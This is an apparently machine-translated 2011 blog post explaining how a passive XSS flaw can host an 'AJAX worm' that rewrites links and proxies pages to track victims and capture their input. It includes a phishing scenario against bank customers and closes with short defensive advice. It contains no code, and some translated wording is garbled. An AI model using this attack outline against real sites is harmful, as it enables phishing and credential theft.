Main » 2011 » Март » 16 » One step from passive xss vulnerabilities before the implementation of ajax worm
12:26
One step from passive xss vulnerabilities before the implementation of ajax worm
Many times I meet with the opinion that the passive XSS vulnerability does not pose a great danger and worry about it especially not worth it. And despite the fact that this is partly true (when compared with other, more catastrophic errors), the possibility of introducing a code on a vulnerable site, even requiring significant additional actions to deceive the user can lead to serious consequences, in particular to unable to fully capture further user action.

What is AJAX worm?


AJAX worm - JavaScript code, modifying links on the page to find your way to stay in the context of the current page when the user navigates on these links replacing full navigation AJAX queries. In the simplest version is implemented in a few lines, as follows.

1. Get all the links on the page
2. Add to all of them own handler
3. Execute AJAX request with the address clicked sslyki
4. spoofing the content page of results obtained in Section 3
5. Infecting links new content

Obviously, this is a very simplified scenario, a full "combat" the worm will follow the correct change of title pages and connecting css and js files in the header, and possibly exploit the url spoofing in those browsers, it is possible. But the easiest option that places the received data directly into the element body, is quite efficient. An example of implementation.

A small digression - if there was a possibility obtained from any browser code page in the network security problem would be much more serious, fortunately all modern browsers do not allow to perform cross-site requests. But this can be circumvented by passing the request for an interim application located on the same domain as the page with the worm and fulfilling the function of rocking content.


In the simplest case, this application is implemented in a single line in the php. Battle same option should at least be able to cache the downloaded data to minimize the increased 2-fold while the client receives the data quite well, and in the ideal case - support sending / receiving cookies, and make requests through a set of proxy not to impersonate too often shining ip in the logs.

Even in this simplest case we get an infected page allows us to "move" on the network, actually staying on the same page and if you want logiruya movement of the wearer and the input of data. Of course, if the user notices that the page address magically stays the same or that in the status bar is constantly hanging requests to an unfamiliar domain, it can immediately score a concern, but we're so smart and the average user could easily and to ignore this fact.

Although this method and can do a lot of dirty tricks, it requires too much action for the initial lured man on the pages of the trap. Not to mention the fact that this page very quickly turns into various blacklists browsers, and that if the page-trap would be strange, totally safe at first glance, the page with a familiar user domain. Here also engages the opportunity to introduce its own code by XSS vulnerability on another website.

Imagine an intelligent attacker conducting a phishing attack against users of the bank. He does not need to create any fraudulent sites, sufficient to indicate in the letter of reference to the vulnerable page and user is confident that the transition to a trusted domain, will be in the contaminated zone. And is not necessarily what he sees before is, for example, site search, JavaScript allows you to arbitrarily modify the content and meaning, before the user can provide an index or any other page.

Moreover, an attacker could completely avoid the use of layers to get the data, because the requested data within a single domain, and thus can be obtained by direct AJAX request. Alternatively, an attacker can use the same vulnerabilities the page to minimize the visibility of the infection, since this will be the real transitions between pages, and the target link can be encrypted, such as anchor of URL.



And what do with all that.


Do not allow the existence of XSS vulnerabilities - manual and automated testing, as well as the use of frameworks with a correct policy of screening data from the outside.

Since the attacker has introduced its code in the page of the site we have completely lost control, and any protective scripts can be cut from the package, and the data entered by the user transferred to the server side. The only palliative may be fixed form login page and checking the referee and the ip address of the sending login script, thus You can not allow an attacker to automatically get into the system. That, however, did not prevent him to use stolen data itself.
Views: 354 | Added by: w1zard | Rating: 0.0/0
Total comments: 0
Имя *:
Email *:
Код *: